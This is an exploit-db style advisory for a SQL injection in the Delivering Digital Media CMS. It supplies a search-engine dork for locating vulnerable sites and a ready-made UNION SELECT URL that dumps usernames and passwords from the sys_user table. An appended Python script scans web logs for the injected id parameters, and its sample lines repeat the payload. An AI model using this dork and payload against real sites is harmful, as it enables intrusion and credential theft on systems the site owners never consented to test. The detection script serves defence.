Delivering Digital Media CMS SQL Injection Vulnerability

2010-06-03 16:03:13

# Title: Delivering Digital Media CMS SQL Injection Vulnerability
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published:
# Verified:


N.A.S.T
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************

[!] Delivering Digital Media CMS SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : [email protected] & [email protected]

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.delivering.info
[+] script : Delivering Digital Media CMS
[+] Download : http://www.delivering.info/contacto/delivering-argentina.php (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"index.php?edicion_id="

**************************************************************************/
[ Vulnerable File ]

http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

[ Exploit ]

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

[ GReets ]

[+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS


EXAMPLE: http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--


Fixes

No fixes
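
With no fix listed, requests of the kind shown above can at least be spotted in web-server logs. The following is an added example, not part of the original advisory or the vendor's code: it assumes an Apache/nginx combined-format access log and flags any request whose edicion_id, categoria_id, origen_id or articulo_id value is not a plain integer. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The four query parameters the advisory's URLs pass to index.php. Every
# legitimate value shown on the page is a plain integer, so anything else is flagged.
ID_PARAMS = ("edicion_id", "categoria_id", "origen_id", "articulo_id")
PLAIN_INT = re.compile(r"[0-9]{1,10}")

# Assumption: combined log format, request line quoted as "METHOD URL HTTP/x.y".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def non_integer_ids(url):
    """Return {param: decoded value} for each id parameter that is not a plain integer."""
    # parse_qs decodes %xx escapes and '+', so encoded payloads are checked decoded.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    bad = {}
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if not PLAIN_INT.fullmatch(value):
                bad[name] = value
    return bad


def scan(log_lines):
    """Yield (line_number, offending parameters) for each flagged request."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            bad = non_integer_ids(match.group(1))
            if bad:
                yield number, bad


# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jun/2010:16:01:02 +0000] "GET /index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [03/Jun/2010:16:02:40 +0000] "GET /index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3+from+sys_user-- HTTP/1.1" 200 7301 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [03/Jun/2010:16:02:55 +0000] "GET /sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+GROUP_concat%28username%29+from+sys_user-- HTTP/1.1" 200 7410 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: {bad}")
```

The same plain-integer check, applied server-side before the query is built, rejects the injected articulo_id value.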
